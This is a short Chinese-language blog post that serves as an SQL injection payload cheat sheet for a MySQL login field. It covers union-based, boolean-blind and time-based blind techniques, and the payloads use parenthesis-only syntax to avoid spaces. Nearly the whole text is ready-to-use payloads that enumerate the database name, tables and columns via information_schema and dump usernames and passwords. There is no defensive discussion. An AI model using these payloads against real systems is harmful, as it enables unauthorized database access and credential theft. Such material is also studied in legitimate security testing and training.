vlambda博客
学习文章列表

数据库结构

数据库内容

1.报错注入

判断注入点

admin'and(1=1)#

admin'and(1=2)#

确定列数

admin'union(select(1),(2),(3))#

查询user

admin'union(select(1),(user()),(3))#

查询数据库名

admin'union(select(1),(database()),(3))#

查询表名

admin'union(select(table_name),(2),(3)from(information_schema.tables)where(table_schema=0x74657374))#

查询列名

admin'union((select(column_name),(2),(3)from(information_schema.columns)where(table_schema=0x74657374)and(table_name=0x75736572)))#

查询数据

admin'union(select(username),(password),(3)from(user))#

2.布尔盲注

确定列数

admin'union(select(1),(2),(3))#

确定数据库名长度

admin'and(length(database())=4)#

获取数据库第一位字符串,剩下的以此类推

admin'and(ascii(mid(database(),1,1))=116)#

获取表名

admin'and(select(ascii(mid(group_concat(table_name),1,1))=116)from(information_schema.columns)where(table_schema=0x74657374))#

获取字段名

admin'and(select(ascii(mid(group_concat(column_name),1,1))=73)from(information_schema.columns)where(table_schema=0x74657374)and(table_name=0x75736572))#

获取数据

admin'and(select(ascii(mid(group_concat(username),1,1))=97)from(user))#

3.时间盲注

获取数据库名称

admin'and(if((ascii(mid(database(),1,1))=116),sleep(5),0))#

获取表名

admin'and(if((select(ascii(mid(group_concat(table_name),1,1))=116)from(information_schema.columns)where(table_schema=0x74657374)),sleep(5),0))#

获取字段名

admin'and(if((select(ascii(mid(group_concat(column_name),1,1))=73)from(information_schema.columns)where(table_schema=0x74657374)and(table_name=0x75736572)),sleep(5),0))#

获取数据

admin'and(if((select(ascii(mid(group_concat(username),1,1))=97)from(user)),sleep(5),1))#